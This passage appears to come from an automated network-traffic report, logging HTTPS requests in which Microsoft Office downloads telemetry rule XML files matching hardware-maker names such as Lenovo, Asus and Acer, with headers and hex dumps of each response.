                                  2024-11-25 23:29:13 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  26192.168.2.44977613.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:13 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:13 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:13 GMT
                                  Content-Type: text/xml
                                  Content-Length: 632
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                  ETag: "0x8DC582BB6E3779E"
                                  x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232913Z-174f7845968xlwnmhC1EWR0sv80000000ugg0000000005mr
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:13 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  27192.168.2.44977713.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:13 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:13 UTC470INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:13 GMT
                                  Content-Type: text/xml
                                  Content-Length: 467
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                  ETag: "0x8DC582BA6C038BC"
                                  x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232913Z-174f7845968cpnpfhC1EWR3afc0000000ua000000000073t
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:13 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  28192.168.2.44977413.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:13 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:13 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:13 GMT
                                  Content-Type: text/xml
                                  Content-Length: 471
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                  ETag: "0x8DC582BB10C598B"
                                  x-ms-request-id: 30944020-a01e-0053-5e8b-3f8603000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232913Z-174f78459684bddphC1EWRbht40000000u80000000000b6s
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:13 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  29192.168.2.44977513.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:13 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:13 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:13 GMT
                                  Content-Type: text/xml
                                  Content-Length: 415
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                  ETag: "0x8DC582B9F6F3512"
                                  x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232913Z-174f7845968xlwnmhC1EWR0sv80000000udg0000000006fb
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:13 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  30192.168.2.44977813.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:15 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:15 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:15 GMT
                                  Content-Type: text/xml
                                  Content-Length: 407
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                  ETag: "0x8DC582BBAD04B7B"
                                  x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232915Z-174f78459685m244hC1EWRgp2c0000000ub0000000000bgz
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:15 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  31192.168.2.44977913.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:15 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:15 UTC470INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:15 GMT
                                  Content-Type: text/xml
                                  Content-Length: 486
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                  ETag: "0x8DC582BB344914B"
                                  x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232915Z-174f7845968glpgnhC1EWR7uec0000000ut00000000008b6
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  32192.168.2.44978013.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:15 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:15 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:15 GMT
                                  Content-Type: text/xml
                                  Content-Length: 427
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                  ETag: "0x8DC582BA310DA18"
                                  x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232915Z-174f7845968cdxdrhC1EWRg0en0000000up00000000007xw
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:15 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  33192.168.2.44978213.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:15 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:16 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:15 GMT
                                  Content-Type: text/xml
                                  Content-Length: 407
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                  ETag: "0x8DC582B9698189B"
                                  x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232915Z-174f7845968px8v7hC1EWR08ng0000000ux00000000005xw
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:16 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  34192.168.2.44978113.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:15 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:16 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:15 GMT
                                  Content-Type: text/xml
                                  Content-Length: 486
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                  ETag: "0x8DC582B9018290B"
                                  x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232915Z-174f7845968frfdmhC1EWRxxbw0000000ung0000000008cm
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:16 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  35192.168.2.44978413.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:17 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:17 UTC470INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:17 GMT
                                  Content-Type: text/xml
                                  Content-Length: 469
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                  ETag: "0x8DC582BBA701121"
                                  x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232917Z-174f7845968kdththC1EWRzvxn00000006v0000000000asm
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:17 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  36192.168.2.44978513.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:17 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:18 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:17 GMT
                                  Content-Type: text/xml
                                  Content-Length: 415
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                  ETag: "0x8DC582BA41997E3"
                                  x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232917Z-174f7845968kdththC1EWRzvxn000000072000000000059f
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
